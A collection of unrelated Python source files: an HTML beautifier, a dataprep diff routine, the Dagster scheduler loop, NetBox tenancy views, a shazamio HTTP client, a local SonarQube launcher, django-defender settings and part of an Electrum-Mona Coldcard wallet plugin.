encodingToUse = detectedEncoding
if not detectedEncoding:
# when all things failed, go 'utf-8' for now
# TODO: find another way
encodingToUse = 'utf-8'
try:
text = text.decode(encodingToUse, 'ignore')
except UnicodeEncodeError as e:
        msg = str(e) + ' Encoding used: {}'.format(encodingToUse)
warnings.warn(msg)
return text
def isUnicode(text):
"""Return True if `text` is unicode. False otherwise. Note that because
the function has to work on both Python 2 and Python 3, u'' cannot be used
in doctest.
:param text: string to check if it is unicode
:returns: | **True** if `text` is unicode,
| **False** otherwise
>>> import sys
>>> if sys.version_info[0] >= 3:
... isUnicode(bytes('hello', 'ascii'))
... else:
... isUnicode(bytes('hello'))
False
>>> import sys
>>> if sys.version_info[0] >= 3:
... unicode = str
>>> isUnicode(unicode('hello'))
True
"""
if sys.version_info[0] >= 3:
if isinstance(text, str):
return True
else:
return False
else:
if isinstance(text, str):
return False
else:
return True
class BeautifierBase(object):
"""Base Class for Beautifiers"""
reIndentAndScript = re.compile(r'^(\s*)<script.*?>(.*?)\s*</script',
re.MULTILINE | re.DOTALL | re.IGNORECASE)
reIndentAndStyle = re.compile(r'^(\s*)<style.*?>(.*?)\s*</style',
re.MULTILINE | re.DOTALL | re.IGNORECASE)
@staticmethod
def _stripHTMLComments(text):
"""Removing HTML Comments '<!-- ... -->' out of `text`
:returns: a tuple with the following fields
- text with comment(s) removed
- removed comment(s)
"""
textWithoutComments = ''
comments = []
sep = ('<!--', '-->')
fragments = text.split(sep[0])
if len(fragments) == 1:
textWithoutComments = fragments[0]
else:
textWithoutComments += fragments[0]
for f in fragments[1:]:
tmp = f.split(sep[-1])
if len(tmp) == 1:
# found comment with no endtag ...
# ignore for now
textWithoutComments += tmp[0]
elif len(tmp) == 2:
# this is the correct case
textWithoutComments += tmp[-1]
comments.append(sep[0] + tmp[0].rstrip() + sep[-1])
else:
# this should never happen (maybe invalid
# nested comment)
# for this we take maximum chunk as comment
textWithoutComments += tmp[-1]
comments.append(sep[0] + ''.join(tmp[:-1]) + sep[-1])
return (textWithoutComments, os.linesep.join(comments))
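    # Illustrative example (not from the original source):
    # >>> BeautifierBase._stripHTMLComments('<p>a</p><!-- note --><p>b</p>')
    # ('<p>a</p><p>b</p>', '<!-- note-->')
    # The comment body keeps its leading whitespace but is right-stripped before the
    # closing '-->' is re-attached; multiple comments are joined with os.linesep.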
@classmethod
def _findAndReplace(cls, text, regExp, bfunc, bfuncArgs, indent=2):
"""Find and replace `text` with what returned by `regExp` by
beautifing function `bfunc` and params `bfuncArgs`.
:param text: text to be find and replace
:param regExp: regular expression that returns a list of pairs of
(indent, textRequiresFormatting). E.g.
(' ', '* { margin : 0; }')
:param bfunc: beautifying function that take the following
parameters (ordered):
- textRequiresFormatting
- other optional arguments
:param bfuncArgs: list of arguments for `bfunc`
        :param indent: width of indentation for sections of text that require
                       beautifying
:returns: beautified text
"""
final = text
sections = []
marker = '%%__mark__%%'
matches = regExp.finditer(text)
if matches:
adjustment = 0
for mo in matches:
spaces, script = mo.groups()
if not script.strip():
continue
start, end = mo.span()
start += adjustment
thisIndent = ' ' * (len(spaces) + indent)
newScript, comments = cls._stripHTMLComments(script)
params = (newScript,) + bfuncArgs
lines = [thisIndent + l for l in bfunc(*params).splitlines()]
lines.extend([thisIndent + l for l in comments.splitlines()])
sections.append(os.linesep.join(lines))
final = final[:start] + final[start:].replace(
script, marker, 1)
adjustment += len(marker) - len(script)
for s in sections:
final = final.replace(marker, os.linesep + s, 1)
return final
|
"""Computations for plot_diff([df...])."""
from typing import Optional, Union, List, Dict, Any
import dask.dataframe as dd
import pandas as pd
from ....errors import DataprepError
from ...intermediate import Intermediate
from ...utils import to_dask
from ...dtypes import DTypeDef
from ...configs import Config
from .multiple_df import compare_multiple_df # type: ignore
__all__ = ["compute_diff"]
def compute_diff(
df: Union[List[Union[pd.DataFrame, dd.DataFrame]], Union[pd.DataFrame, dd.DataFrame]],
x: Optional[str] = None,
*,
cfg: Union[Config, Dict[str, Any], None] = None,
display: Optional[List[str]] = None,
dtype: Optional[DTypeDef] = None,
) -> Intermediate:
"""
All in one compute function.
Parameters
----------
df
DataFrame from which visualizations are generated
    cfg: Union[Config, Dict[str, Any], None], default None
        When a user calls plot(), the created Config object will be passed to compute().
        When a user calls compute() directly and wants to customize the output,
        cfg is a dictionary for configuring. If not, cfg is None and
        default values will be used for the parameters.
    display: Optional[List[str]], default None
        A list containing the names of the visualizations to display. Only exists when
        a user calls compute() directly and wants to customize the output.
x: Optional[str], default None
A valid column name from the dataframe
dtype: str or DType or dict of str or dict of DType, default None
Specify Data Types for designated column or all columns.
E.g. dtype = {"a": Continuous, "b": "Nominal"} or
dtype = {"a": Continuous(), "b": "nominal"}
        or dtype = Continuous() or dtype = "Continuous"
"""
if isinstance(cfg, dict):
cfg = Config.from_dict(display, cfg)
elif not cfg:
cfg = Config()
if isinstance(df, list):
if len(df) < 2:
raise DataprepError("plot_diff needs at least 2 DataFrames.")
if len(df) > 5:
raise DataprepError("Too many DataFrames, max: 5.")
label = cfg.diff.label
if not label:
cfg.diff.label = [f"df{i+1}" for i in range(len(df))]
elif len(df) != len(label):
raise ValueError("Number of the given label doesn't match the number of DataFrames.")
if cfg.diff.baseline > len(df) - 1:
raise ValueError("Baseline is out of the boundary of the input.")
df_list = list(map(to_dask, df))
for i, _ in enumerate(df_list):
df_list[i].columns = df_list[i].columns.astype(str)
if x:
# return compare_multiple_on_column(df_list, x)
return Intermediate()
else:
return compare_multiple_df(df_list, cfg, dtype) # type: ignore
else:
raise TypeError(f"Invalid input type: {type(df)}")
|
import datetime
import os
import sys
import time
import pendulum
from dagster import check
from dagster.core.errors import DagsterUserCodeUnreachableError
from dagster.core.host_representation import PipelineSelector, RepositoryLocation
from dagster.core.instance import DagsterInstance
from dagster.core.scheduler.instigation import (
InstigatorState,
InstigatorStatus,
InstigatorType,
TickData,
TickStatus,
)
from dagster.core.scheduler.scheduler import DEFAULT_MAX_CATCHUP_RUNS, DagsterSchedulerError
from dagster.core.storage.pipeline_run import PipelineRun, PipelineRunStatus, PipelineRunsFilter
from dagster.core.storage.tags import RUN_KEY_TAG, SCHEDULED_EXECUTION_TIME_TAG, check_tags
from dagster.core.workspace import IWorkspace
from dagster.seven.compat.pendulum import to_timezone
from dagster.utils import merge_dicts
from dagster.utils.error import serializable_error_info_from_exc_info
from dagster.utils.log import default_date_format_string
class _ScheduleLaunchContext:
def __init__(self, tick, instance, logger):
self._instance = instance
self._logger = logger
self._tick = tick
@property
def failure_count(self) -> int:
return self._tick.job_tick_data.failure_count
def update_state(self, status, error=None, **kwargs):
skip_reason = kwargs.get("skip_reason")
if "skip_reason" in kwargs:
del kwargs["skip_reason"]
self._tick = self._tick.with_status(status=status, error=error, **kwargs)
if skip_reason:
self._tick = self._tick.with_reason(skip_reason=skip_reason)
def add_run(self, run_id, run_key=None):
self._tick = self._tick.with_run(run_id, run_key)
def _write(self):
self._instance.update_job_tick(self._tick)
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self._write()
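# Note, derived from the code above and its use in launch_scheduled_runs_for_schedule
# below: _ScheduleLaunchContext wraps the evaluation of a single schedule tick.
# update_state/add_run only mutate the in-memory tick; the accumulated state is
# persisted via instance.update_job_tick when the with-block exits.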
MIN_INTERVAL_LOOP_TIME = 5
RELOAD_WORKSPACE = 60
def execute_scheduler_iteration_loop(
instance, workspace, logger, max_catchup_runs, max_tick_retries
):
workspace_loaded_time = pendulum.now("UTC").timestamp()
workspace_iteration = 0
start_time = pendulum.now("UTC").timestamp()
while True:
start_time = pendulum.now("UTC").timestamp()
if start_time - workspace_loaded_time > RELOAD_WORKSPACE:
workspace.cleanup()
workspace_loaded_time = pendulum.now("UTC").timestamp()
workspace_iteration = 0
end_datetime_utc = pendulum.now("UTC")
yield from launch_scheduled_runs(
instance,
workspace,
logger,
end_datetime_utc=end_datetime_utc,
max_catchup_runs=max_catchup_runs,
max_tick_retries=max_tick_retries,
log_verbose_checks=(workspace_iteration == 0),
)
loop_duration = pendulum.now("UTC").timestamp() - start_time
sleep_time = max(0, MIN_INTERVAL_LOOP_TIME - loop_duration)
time.sleep(sleep_time)
yield
workspace_iteration += 1
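# Summary of the loop above (derived from the code): each iteration launches any due
# scheduled runs, then sleeps so that iterations are at least MIN_INTERVAL_LOOP_TIME
# (5) seconds apart; workspace.cleanup() is called roughly every RELOAD_WORKSPACE (60)
# seconds, presumably to force a fresh workspace, and verbose checks are only logged on
# the first iteration after such a reload.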
def launch_scheduled_runs(
instance,
workspace,
logger,
end_datetime_utc,
max_catchup_runs=DEFAULT_MAX_CATCHUP_RUNS,
max_tick_retries=0,
debug_crash_flags=None,
log_verbose_checks=True,
):
check.inst_param(instance, "instance", DagsterInstance)
check.inst_param(workspace, "workspace", IWorkspace)
schedules = [
s
for s in instance.all_stored_job_state(job_type=InstigatorType.SCHEDULE)
if s.status == InstigatorStatus.RUNNING
]
if not schedules:
if log_verbose_checks:
# Only log the "No schedules have been started" warning once per workspace reload
# to avoid spamming the logs
logger.info("Not checking for any runs since no schedules have been started.")
yield
return
if log_verbose_checks:
schedule_names = ", ".join([schedule.job_name for schedule in schedules])
logger.info(f"Checking for new runs for the following schedules: {schedule_names}")
for schedule_state in schedules:
error_info = None
try:
origin = schedule_state.origin.external_repository_origin.repository_location_origin
repo_location = workspace.get_location(origin)
yield from launch_scheduled_runs_for_schedule(
instance,
logger,
schedule_state,
workspace,
repo_location,
end_datetime_utc,
max_catchup_runs,
max_tick_retries,
(debug_crash_flags.get(schedule_state.job_name) if debug_crash_flags else None),
log_verbose_checks=log_verbose_checks,
)
except Exception:
error_info = serializable_error_info_from_exc_info(sys.exc_info())
logger.error(
f"Scheduler caught an error for schedule {schedule_state.job_name} : {error_info.to_string()}"
)
yield error_info
def launch_scheduled_runs_for_schedule(
instance,
logger,
schedule_state,
workspace,
repo_location,
end_datetime_utc,
max_catchup_runs,
max_tick_retries,
debug_crash_flags=None,
log_verbose_checks=True,
):
check.inst_param(instance, "instance", DagsterInstance)
check.inst_param(schedule_state, "schedule_state", InstigatorState)
check.inst_param(end_datetime_utc, "end_datetime_utc", datetime.datetime)
check.inst_param(repo_location, "repo_location", RepositoryLocation)
latest_tick = instance.get_latest_job_tick(schedule_state.job_origin_id)
start_timestamp_utc = schedule_state.job_specific_data.start_timestamp
if latest_tick:
if latest_tick.status == TickStatus.STARTED:
# Scheduler was interrupted while performing this tick, re-do it
start_timestamp_utc = max(start_timestamp_utc, latest_tick.timestamp)
elif (
latest_tick.status == TickStatus.FAILURE
and latest_tick.failure_count <= max_tick_retries
):
# Tick failed and hasn't reached its retry limit, retry it
start_timestamp_utc = max(start_timestamp_utc, latest_tick.timestamp)
else:
start_timestamp_utc = max(start_timestamp_utc, latest_tick.timestamp + 1)
schedule_name = schedule_state.job_name
repo_name = schedule_state.origin.external_repository_origin.repository_name
if not repo_location.has_repository(repo_name):
raise DagsterSchedulerError(
f"Could not find repository {repo_name} in location {repo_location.name} to "
+ f"run schedule {schedule_name}. If this repository no longer exists, you can "
+ "turn off the schedule in the Dagit UI.",
)
external_repo = repo_location.get_repository(repo_name)
if not external_repo.has_external_schedule(schedule_name):
raise DagsterSchedulerError(
f"Could not find schedule {schedule_name} in repository {repo_name}. If this "
"schedule no longer exists, you can turn it off in the Dagit UI.",
)
external_schedule = external_repo.get_external_schedule(schedule_name)
timezone_str = external_schedule.execution_timezone
if not timezone_str:
timezone_str = "UTC"
if log_verbose_checks:
logger.warn(
f"Using UTC as the timezone for {external_schedule.name} as it did not specify "
"an execution_timezone in its definition."
)
tick_times = []
for next_time in external_schedule.execution_time_iterator(start_timestamp_utc):
if next_time.timestamp() > end_datetime_utc.timestamp():
break
tick_times.append(next_time)
if not tick_times:
if log_verbose_checks:
logger.info(f"No new runs for {schedule_name}")
return
if not external_schedule.partition_set_name and len(tick_times) > 1:
logger.warning(f"{schedule_name} has no partition set, so not trying to catch up")
tick_times = tick_times[-1:]
elif len(tick_times) > max_catchup_runs:
logger.warning(f"{schedule_name} has fallen behind, only launching {max_catchup_runs} runs")
tick_times = tick_times[-max_catchup_runs:]
if len(tick_times) == 1:
tick_time = tick_times[0].strftime(default_date_format_string())
logger.info(f"Evaluating schedule `{schedule_name}` at {tick_time}")
else:
times = ", ".join([time.strftime(default_date_format_string()) for time in tick_times])
logger.info(f"Evaluating schedule `{schedule_name}` at the following times: {times}")
for schedule_time in tick_times:
schedule_timestamp = schedule_time.timestamp()
schedule_time_str = schedule_time.strftime(default_date_format_string())
if latest_tick and latest_tick.timestamp == schedule_timestamp:
tick = latest_tick
if latest_tick.status == TickStatus.FAILURE:
logger.info(f"Retrying previously failed schedule execution at {schedule_time_str}")
else:
logger.info(
f"Resuming previously interrupted schedule execution at {schedule_time_str}"
)
else:
tick = instance.create_job_tick(
TickData(
job_origin_id=external_schedule.get_external_origin_id(),
job_name=schedule_name,
job_type=InstigatorType.SCHEDULE,
status=TickStatus.STARTED,
timestamp=schedule_timestamp,
)
)
_check_for_debug_crash(debug_crash_flags, "TICK_CREATED")
with _ScheduleLaunchContext(tick, instance, logger) as tick_context:
try:
_check_for_debug_crash(debug_crash_flags, "TICK_HELD")
yield from _schedule_runs_at_time(
instance,
logger,
workspace,
repo_location,
external_repo,
external_schedule,
schedule_time,
tick_context,
debug_crash_flags,
)
except Exception as e:
if isinstance(e, DagsterUserCodeUnreachableError):
try:
raise DagsterSchedulerError(
f"Unable to reach the user code server for schedule {schedule_name}. Schedule will resume execution once the server is available."
) from e
except:
error_data = serializable_error_info_from_exc_info(sys.exc_info())
tick_context.update_state(
TickStatus.FAILURE,
error=error_data,
# don't increment the failure count - retry forever until the server comes back up
# or the schedule is turned off
failure_count=tick_context.failure_count,
)
raise # Raise the wrapped DagsterSchedulerError exception
else:
error_data = serializable_error_info_from_exc_info(sys.exc_info())
tick_context.update_state(
TickStatus.FAILURE,
error=error_data,
failure_count=tick_context.failure_count + 1,
)
raise
def _check_for_debug_crash(debug_crash_flags, key):
if not debug_crash_flags:
return
kill_signal = debug_crash_flags.get(key)
if not kill_signal:
return
os.kill(os.getpid(), kill_signal)
time.sleep(10)
raise Exception("Process didn't terminate after sending crash signal")
def _schedule_runs_at_time(
instance,
logger,
workspace,
repo_location,
external_repo,
external_schedule,
schedule_time,
tick_context,
debug_crash_flags,
):
schedule_name = external_schedule.name
pipeline_selector = PipelineSelector(
location_name=repo_location.name,
repository_name=external_repo.name,
pipeline_name=external_schedule.pipeline_name,
solid_selection=external_schedule.solid_selection,
)
external_pipeline = repo_location.get_external_pipeline(pipeline_selector)
schedule_execution_data = repo_location.get_external_schedule_execution_data(
instance=instance,
repository_handle=external_repo.handle,
schedule_name=external_schedule.name,
scheduled_execution_time=schedule_time,
)
yield
if not schedule_execution_data.run_requests:
if schedule_execution_data.skip_message:
logger.info(
f"Schedule {external_schedule.name} skipped: {schedule_execution_data.skip_message}"
)
else:
logger.info(f"No run requests returned for {external_schedule.name}, skipping")
# Update tick to skipped state and return
tick_context.update_state(
TickStatus.SKIPPED, skip_reason=schedule_execution_data.skip_message
)
return
for run_request in schedule_execution_data.run_requests:
run = _get_existing_run_for_request(instance, external_schedule, schedule_time, run_request)
if run:
if run.status != PipelineRunStatus.NOT_STARTED:
# A run already exists and was launched for this time period,
# but the scheduler must have crashed or errored before the tick could be put
# into a SUCCESS state
logger.info(
f"Run {run.run_id} already completed for this execution of {external_schedule.name}"
)
tick_context.add_run(run_id=run.run_id, run_key=run_request.run_key)
yield
continue
else:
logger.info(
f"Run {run.run_id} already created for this execution of {external_schedule.name}"
)
else:
run = _create_scheduler_run(
instance,
schedule_time,
repo_location,
external_schedule,
external_pipeline,
run_request,
)
_check_for_debug_crash(debug_crash_flags, "RUN_CREATED")
if run.status != PipelineRunStatus.FAILURE:
try:
instance.submit_run(run.run_id, workspace)
logger.info(f"Completed scheduled launch of run {run.run_id} for {schedule_name}")
except Exception:
error_info = serializable_error_info_from_exc_info(sys.exc_info())
logger.error(
f"Run {run.run_id} created successfully but failed to launch: {str(serializable_error_info_from_exc_info(sys.exc_info()))}"
)
yield error_info
_check_for_debug_crash(debug_crash_flags, "RUN_LAUNCHED")
tick_context.add_run(run_id=run.run_id, run_key=run_request.run_key)
_check_for_debug_crash(debug_crash_flags, "RUN_ADDED")
yield
_check_for_debug_crash(debug_crash_flags, "TICK_SUCCESS")
tick_context.update_state(TickStatus.SUCCESS)
def _get_existing_run_for_request(instance, external_schedule, schedule_time, run_request):
tags = merge_dicts(
PipelineRun.tags_for_schedule(external_schedule),
{
SCHEDULED_EXECUTION_TIME_TAG: to_timezone(schedule_time, "UTC").isoformat(),
},
)
if run_request.run_key:
tags[RUN_KEY_TAG] = run_request.run_key
runs_filter = PipelineRunsFilter(tags=tags)
existing_runs = instance.get_runs(runs_filter)
if not len(existing_runs):
return None
return existing_runs[0]
def _create_scheduler_run(
instance,
schedule_time,
repo_location,
external_schedule,
external_pipeline,
run_request,
):
run_config = run_request.run_config
schedule_tags = run_request.tags
external_execution_plan = repo_location.get_external_execution_plan(
external_pipeline,
run_config,
external_schedule.mode,
step_keys_to_execute=None,
known_state=None,
)
execution_plan_snapshot = external_execution_plan.execution_plan_snapshot
pipeline_tags = external_pipeline.tags or {}
check_tags(pipeline_tags, "pipeline_tags")
tags = merge_dicts(pipeline_tags, schedule_tags)
tags[SCHEDULED_EXECUTION_TIME_TAG] = to_timezone(schedule_time, "UTC").isoformat()
if run_request.run_key:
tags[RUN_KEY_TAG] = run_request.run_key
return instance.create_run(
pipeline_name=external_schedule.pipeline_name,
run_id=None,
run_config=run_config,
mode=external_schedule.mode,
solids_to_execute=external_pipeline.solids_to_execute,
step_keys_to_execute=None,
solid_selection=external_pipeline.solid_selection,
status=PipelineRunStatus.NOT_STARTED,
root_run_id=None,
parent_run_id=None,
tags=tags,
pipeline_snapshot=external_pipeline.pipeline_snapshot,
execution_plan_snapshot=execution_plan_snapshot,
parent_pipeline_snapshot=external_pipeline.parent_pipeline_snapshot,
external_pipeline_origin=external_pipeline.get_external_origin(),
pipeline_code_origin=external_pipeline.get_python_origin(),
)
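# Illustrative sketch (not part of dagster): the tick resume/retry decision used
# near the top of launch_scheduled_runs_for_schedule, extracted as a pure function.
# Status values are plain strings here; the real code compares TickStatus members.
def _next_start_timestamp_sketch(schedule_start_ts, latest_tick_status,
                                 latest_tick_ts, failure_count, max_tick_retries):
    if latest_tick_status == "STARTED":
        # Scheduler was interrupted mid-tick: evaluate the same tick time again.
        return max(schedule_start_ts, latest_tick_ts)
    if latest_tick_status == "FAILURE" and failure_count <= max_tick_retries:
        # Failed tick with retries remaining: evaluate the same tick time again.
        return max(schedule_start_ts, latest_tick_ts)
    # Completed tick (or retries exhausted): start strictly after it.
    return max(schedule_start_ts, latest_tick_ts + 1)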
|
from django.contrib.auth.mixins import PermissionRequiredMixin
from django.db.models import Count
from django.shortcuts import get_object_or_404, render
from django.views.generic import View
from circuits.models import Circuit
from dcim.models import Site, Rack, Device, RackReservation
from ipam.models import IPAddress, Prefix, VLAN, VRF
from utilities.views import (
BulkDeleteView, BulkEditView, BulkImportView, ObjectDeleteView, ObjectEditView, ObjectListView,
)
from virtualization.models import VirtualMachine, Cluster
from . import filters, forms, tables
from .models import Tenant, TenantGroup
#
# Tenant groups
#
class TenantGroupListView(PermissionRequiredMixin, ObjectListView):
permission_required = 'tenancy.view_tenantgroup'
queryset = TenantGroup.objects.annotate(tenant_count=Count('tenants'))
table = tables.TenantGroupTable
class TenantGroupCreateView(PermissionRequiredMixin, ObjectEditView):
permission_required = 'tenancy.add_tenantgroup'
model = TenantGroup
model_form = forms.TenantGroupForm
default_return_url = 'tenancy:tenantgroup_list'
class TenantGroupEditView(TenantGroupCreateView):
permission_required = 'tenancy.change_tenantgroup'
class TenantGroupBulkImportView(PermissionRequiredMixin, BulkImportView):
permission_required = 'tenancy.add_tenantgroup'
model_form = forms.TenantGroupCSVForm
table = tables.TenantGroupTable
default_return_url = 'tenancy:tenantgroup_list'
class TenantGroupBulkDeleteView(PermissionRequiredMixin, BulkDeleteView):
permission_required = 'tenancy.delete_tenantgroup'
queryset = TenantGroup.objects.annotate(tenant_count=Count('tenants'))
table = tables.TenantGroupTable
default_return_url = 'tenancy:tenantgroup_list'
#
# Tenants
#
class TenantListView(PermissionRequiredMixin, ObjectListView):
permission_required = 'tenancy.view_tenant'
queryset = Tenant.objects.prefetch_related('group')
filterset = filters.TenantFilterSet
filterset_form = forms.TenantFilterForm
table = tables.TenantTable
class TenantView(PermissionRequiredMixin, View):
permission_required = 'tenancy.view_tenant'
def get(self, request, slug):
tenant = get_object_or_404(Tenant, slug=slug)
stats = {
'site_count': Site.objects.filter(tenant=tenant).count(),
'rack_count': Rack.objects.filter(tenant=tenant).count(),
'rackreservation_count': RackReservation.objects.filter(tenant=tenant).count(),
'device_count': Device.objects.filter(tenant=tenant).count(),
'vrf_count': VRF.objects.filter(tenant=tenant).count(),
'prefix_count': Prefix.objects.filter(tenant=tenant).count(),
'ipaddress_count': IPAddress.objects.filter(tenant=tenant).count(),
'vlan_count': VLAN.objects.filter(tenant=tenant).count(),
'circuit_count': Circuit.objects.filter(tenant=tenant).count(),
'virtualmachine_count': VirtualMachine.objects.filter(tenant=tenant).count(),
'cluster_count': Cluster.objects.filter(tenant=tenant).count(),
}
return render(request, 'tenancy/tenant.html', {
'tenant': tenant,
'stats': stats,
})
class TenantCreateView(PermissionRequiredMixin, ObjectEditView):
permission_required = 'tenancy.add_tenant'
model = Tenant
model_form = forms.TenantForm
template_name = 'tenancy/tenant_edit.html'
default_return_url = 'tenancy:tenant_list'
class TenantEditView(TenantCreateView):
permission_required = 'tenancy.change_tenant'
class TenantDeleteView(PermissionRequiredMixin, ObjectDeleteView):
permission_required = 'tenancy.delete_tenant'
model = Tenant
default_return_url = 'tenancy:tenant_list'
class TenantBulkImportView(PermissionRequiredMixin, BulkImportView):
permission_required = 'tenancy.add_tenant'
model_form = forms.TenantCSVForm
table = tables.TenantTable
default_return_url = 'tenancy:tenant_list'
class TenantBulkEditView(PermissionRequiredMixin, BulkEditView):
permission_required = 'tenancy.change_tenant'
queryset = Tenant.objects.prefetch_related('group')
filterset = filters.TenantFilterSet
table = tables.TenantTable
form = forms.TenantBulkEditForm
default_return_url = 'tenancy:tenant_list'
class TenantBulkDeleteView(PermissionRequiredMixin, BulkDeleteView):
permission_required = 'tenancy.delete_tenant'
queryset = Tenant.objects.prefetch_related('group')
filterset = filters.TenantFilterSet
table = tables.TenantTable
default_return_url = 'tenancy:tenant_list'
|
import aiohttp
from shazamio.exceptions import BadMethod
from shazamio.utils import validate_json
class HTTPClient:
@staticmethod
async def request(method: str, url: str, *args, **kwargs) -> dict:
async with aiohttp.ClientSession() as session:
if method.upper() == 'GET':
async with session.get(url, **kwargs) as resp:
return await validate_json(resp, *args)
elif method.upper() == 'POST':
async with session.post(url, **kwargs) as resp:
return await validate_json(resp, *args)
else:
raise BadMethod('Accept only GET/POST')
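# Minimal usage sketch (not part of the original module): issue a GET request
# through HTTPClient.request. Assumes validate_json(resp) returns the parsed
# JSON body; the URL below is a hypothetical placeholder.
if __name__ == '__main__':
    import asyncio
    async def _demo():
        data = await HTTPClient.request('GET', 'https://example.com/api/resource')
        print(data)
    asyncio.run(_demo())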
|
import subprocess
data = ""
with open('scripts/sonarqubeToken', 'r') as tokenFile:
data=tokenFile.read().replace('\n', '')
subprocess.Popen(["./gradlew", "sonarqube", "-Dsonar.host.url=http://localhost:9000", "-Dsonar.login=" + data], close_fds=True)
|
from os import environ
DEFENDER_REDIS_URL = environ.get('REDIS_URL', 'redis://redis:6379') + '/1'
DEFENDER_USE_CELERY = False
|
#
# Coldcard Electrum plugin main code.
#
#
import os, time, io
import traceback
from typing import TYPE_CHECKING, Optional
import struct
from electrum_mona import bip32
from electrum_mona.bip32 import BIP32Node, InvalidMasterKeyVersionBytes
from electrum_mona.i18n import _
from electrum_mona.plugin import Device, hook, runs_in_hwd_thread
from electrum_mona.keystore import Hardware_KeyStore, KeyStoreWithMPK
from electrum_mona.transaction import PartialTransaction
from electrum_mona.wallet import Standard_Wallet, Multisig_Wallet, Abstract_Wallet
from electrum_mona.util import bfh, bh2u, versiontuple, UserFacingException
from electrum_mona.base_wizard import ScriptTypeNotSupported
from electrum_mona.logging import get_logger
from ..hw_wallet import HW_PluginBase, HardwareClientBase
from ..hw_wallet.plugin import LibraryFoundButUnusable, only_hook_if_libraries_available
_logger = get_logger(__name__)
try:
import hid
from ckcc.protocol import CCProtocolPacker, CCProtocolUnpacker
from ckcc.protocol import CCProtoError, CCUserRefused, CCBusyError
from ckcc.constants import (MAX_MSG_LEN, MAX_BLK_LEN, MSG_SIGNING_MAX_LENGTH, MAX_TXN_LEN,
AF_CLASSIC, AF_P2SH, AF_P2WPKH, AF_P2WSH, AF_P2WPKH_P2SH, AF_P2WSH_P2SH)
from ckcc.client import ColdcardDevice, COINKITE_VID, CKCC_PID, CKCC_SIMULATOR_PATH
requirements_ok = True
class ElectrumColdcardDevice(ColdcardDevice):
# avoid use of pycoin for MiTM message signature test
def mitm_verify(self, sig, expect_xpub):
# verify a signature (65 bytes) over the session key, using the master bip32 node
# - customized to use specific EC library of Electrum.
pubkey = BIP32Node.from_xkey(expect_xpub).eckey
try:
pubkey.verify_message_hash(sig[1:65], self.session_key)
return True
except:
return False
except ImportError as e:
if not (isinstance(e, ModuleNotFoundError) and e.name == 'ckcc'):
_logger.exception('error importing coldcard plugin deps')
requirements_ok = False
COINKITE_VID = 0xd13e
CKCC_PID = 0xcc10
CKCC_SIMULATED_PID = CKCC_PID ^ 0x55aa
class CKCCClient(HardwareClientBase):
def __init__(self, plugin, handler, dev_path, *, is_simulator=False):
HardwareClientBase.__init__(self, plugin=plugin)
self.device = plugin.device
self.handler = handler
# if we know what the (xfp, xpub) "should be" then track it here
self._expected_device = None
if is_simulator:
self.dev = ElectrumColdcardDevice(dev_path, encrypt=True)
else:
# open the real HID device
hd = hid.device(path=dev_path)
hd.open_path(dev_path)
self.dev = ElectrumColdcardDevice(dev=hd, encrypt=True)
# NOTE: MiTM test is delayed until we have a hint as to what XPUB we
# should expect. It's also kinda slow.
def __repr__(self):
return '<CKCCClient: xfp=%s label=%r>' % (xfp2str(self.dev.master_fingerprint),
self.label())
@runs_in_hwd_thread
def verify_connection(self, expected_xfp: int, expected_xpub=None):
ex = (expected_xfp, expected_xpub)
if self._expected_device == ex:
# all is as expected
return
if expected_xpub is None:
expected_xpub = self.dev.master_xpub
if ((self._expected_device is not None)
or (self.dev.master_fingerprint != expected_xfp)
or (self.dev.master_xpub != expected_xpub)):
            # probably indicating programming error, not hacking
_logger.info(f"xpubs. reported by device: {self.dev.master_xpub}. "
f"stored in file: {expected_xpub}")
raise RuntimeError("Expecting %s but that's not what's connected?!" %
xfp2str(expected_xfp))
# check signature over session key
# - mitm might have lied about xfp and xpub up to here
# - important that we use value capture at wallet creation time, not some value
# we read over USB today
self.dev.check_mitm(expected_xpub=expected_xpub)
self._expected_device = ex
if not getattr(self, 'ckcc_xpub', None):
self.ckcc_xpub = expected_xpub
_logger.info("Successfully verified against MiTM")
def is_pairable(self):
# can't do anything w/ devices that aren't setup (this code not normally reachable)
return bool(self.dev.master_xpub)
@runs_in_hwd_thread
def close(self):
# close the HID device (so can be reused)
self.dev.close()
self.dev = None
def is_initialized(self):
return bool(self.dev.master_xpub)
def label(self):
# 'label' of this Coldcard. Warning: gets saved into wallet file, which might
# not be encrypted, so better for privacy if based on xpub/fingerprint rather than
# USB serial number.
if self.dev.is_simulator:
lab = 'Coldcard Simulator ' + xfp2str(self.dev.master_fingerprint)
elif not self.dev.master_fingerprint:
            # fallback; not expected
lab = 'Coldcard #' + self.dev.serial
else:
lab = 'Coldcard ' + xfp2str(self.dev.master_fingerprint)
return lab
def manipulate_keystore_dict_during_wizard_setup(self, d: dict):
master_xpub = self.dev.master_xpub
if master_xpub is not None:
try:
node = BIP32Node.from_xkey(master_xpub)
except InvalidMasterKeyVersionBytes:
raise UserFacingException(
_('Invalid xpub magic. Make sure your {} device is set to the correct chain.').format(self.device) + ' ' +
_('You might have to unplug and plug it in again.')
) from None
d['ckcc_xpub'] = master_xpub
@runs_in_hwd_thread
def has_usable_connection_with_device(self):
# Do end-to-end ping test
try:
self.ping_check()
return True
except:
return False
@runs_in_hwd_thread
def get_xpub(self, bip32_path, xtype):
assert xtype in ColdcardPlugin.SUPPORTED_XTYPES
_logger.info('Derive xtype = %r' % xtype)
xpub = self.dev.send_recv(CCProtocolPacker.get_xpub(bip32_path), timeout=5000)
# TODO handle timeout?
# change type of xpub to the requested type
try:
node = BIP32Node.from_xkey(xpub)
except InvalidMasterKeyVersionBytes:
raise UserFacingException(_('Invalid xpub magic. Make sure your {} device is set to the correct chain.')
.format(self.device)) from None
if xtype != 'standard':
xpub = node._replace(xtype=xtype).to_xpub()
return xpub
@runs_in_hwd_thread
def ping_check(self):
# check connection is working
assert self.dev.session_key, 'not encrypted?'
req = b'1234 Electrum Plugin 4321' # free up to 59 bytes
try:
echo = self.dev.send_recv(CCProtocolPacker.ping(req))
assert echo == req
except:
raise RuntimeError("Communication trouble with Coldcard")
@runs_in_hwd_thread
def show_address(self, path, addr_fmt):
# prompt user w/ address, also returns it immediately.
return self.dev.send_recv(CCProtocolPacker.show_address(path, addr_fmt), timeout=None)
@runs_in_hwd_thread
def show_p2sh_address(self, *args, **kws):
# prompt user w/ p2sh address, also returns it immediately.
return self.dev.send_recv(CCProtocolPacker.show_p2sh_address(*args, **kws), timeout=None)
@runs_in_hwd_thread
def get_version(self):
# gives list of strings
return self.dev.send_recv(CCProtocolPacker.version(), timeout=1000).split('\n')
@runs_in_hwd_thread
